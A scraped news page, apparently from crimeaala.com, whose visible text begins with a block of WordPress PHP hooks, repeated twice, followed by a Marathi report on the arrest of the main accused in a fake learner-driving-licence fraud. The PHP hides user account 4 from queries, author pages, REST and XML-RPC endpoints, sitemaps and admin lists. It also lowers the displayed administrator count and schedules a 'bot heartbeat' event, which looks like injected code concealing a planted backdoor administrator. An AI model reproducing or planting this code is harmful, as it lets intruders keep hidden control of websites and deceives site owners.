add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
बनावट शिकाऊ वाहन चालक परवाना प्रकरणातील मुख्य आरोपीस अटक… - crimeaala.com
mumbai – बनावट शिकाऊ वाहन चालक परवाना (लर्निंग ड्रायव्हिंग लायसन्स) देण्यासाठी बनावट संकेतस्थळ तयार करून शासकीय संगणक प्रणालीमध्ये अनधिकृत प्रवेश करत नागरिकांची फसवणूक करणाऱ्या टोळीतील मुख्य आरोपीला बिहार राज्यातून अटक करण्यात आली आहे. ही कारवाई जालना स्थानिक गुन्हे शाखा आणि सायबर पोलीस ठाण्याने संयुक्तपणे केली आहे.
या प्रकरणी दिनांक 26 नोव्हेंबर 2025 रोजी जालना येथील सहायक मोटार वाहन निरीक्षक तथा उप प्रादेशिक परिवहन अधिकारी अभिजीत कडुबा बावस्कर यांनी फिर्याद दिली होती. अज्ञात आरोपींनी बनावट संकेतस्थळाच्या माध्यमातून शासकीय प्रक्रियेचा गैरवापर करीत आर्थिक लाभासाठी नागरिकांना बनावट शिकाऊ वाहन चालक परवाना उपलब्ध करून दिल्याचा आरोप आहे. त्यावरून सायबर पोलीस ठाणे, जालना येथे गुन्हा दाखल करण्यात आला.
गुन्ह्याचे गांभीर्य लक्षात घेऊन पोलीस अधीक्षक जालना यांच्या मार्गदर्शनाखाली स्थानिक गुन्हे शाखा व सायबर पोलीस ठाण्याचे पथक तयार करण्यात आले. तपासादरम्यान आरोपी नामे बिड्डराज प्रमोद यादव हा आपले वास्तव्य वारंवार बदलत असल्याचे निष्पन्न झाले. अखेर दिनांक 23 डिसेंबर 2025 रोजी पटना, सिमरी बख्तियारपूर व सहरसा परिसरात शोध मोहीम राबवून त्याला ताब्यात घेण्यात आले.
आरोपीकडून गुन्ह्यात वापरलेला लॅपटॉप, आयफोन, थंब मशीन असा सुमारे 1 लाख 46 हजार रुपये किमतीचा मुद्देमाल जप्त करण्यात आला आहे. अटक केलेल्या आरोपीस 28 डिसेंबर 2025 रोजी न्यायालयात हजर केले असता त्याला चार दिवसांची पोलीस कोठडी सुनावण्यात आली आहे.
या गुन्ह्यात यापूर्वी जम्मू-काश्मीर येथील फैसल बशीर मीर आणि जालना येथील मुजाहिद उर्फ डॉन रईसोद्दीन अन्सारी यांना अटक करण्यात आली आहे.
ही कारवाई पोलीस अधीक्षक जालना, अपर पोलीस अधीक्षक तसेच सहरसा जिल्हा पोलीस प्रशासनाच्या मार्गदर्शनाखाली स्थानिक गुन्हे शाखा व सायबर पोलीस ठाण्याच्या अधिकाऱ्यांनी आणि कर्मचाऱ्यांनी संयुक्तपणे पार पाडली, असे परिवहन आयुक्त, मुंबई यांनी कळविले आहे.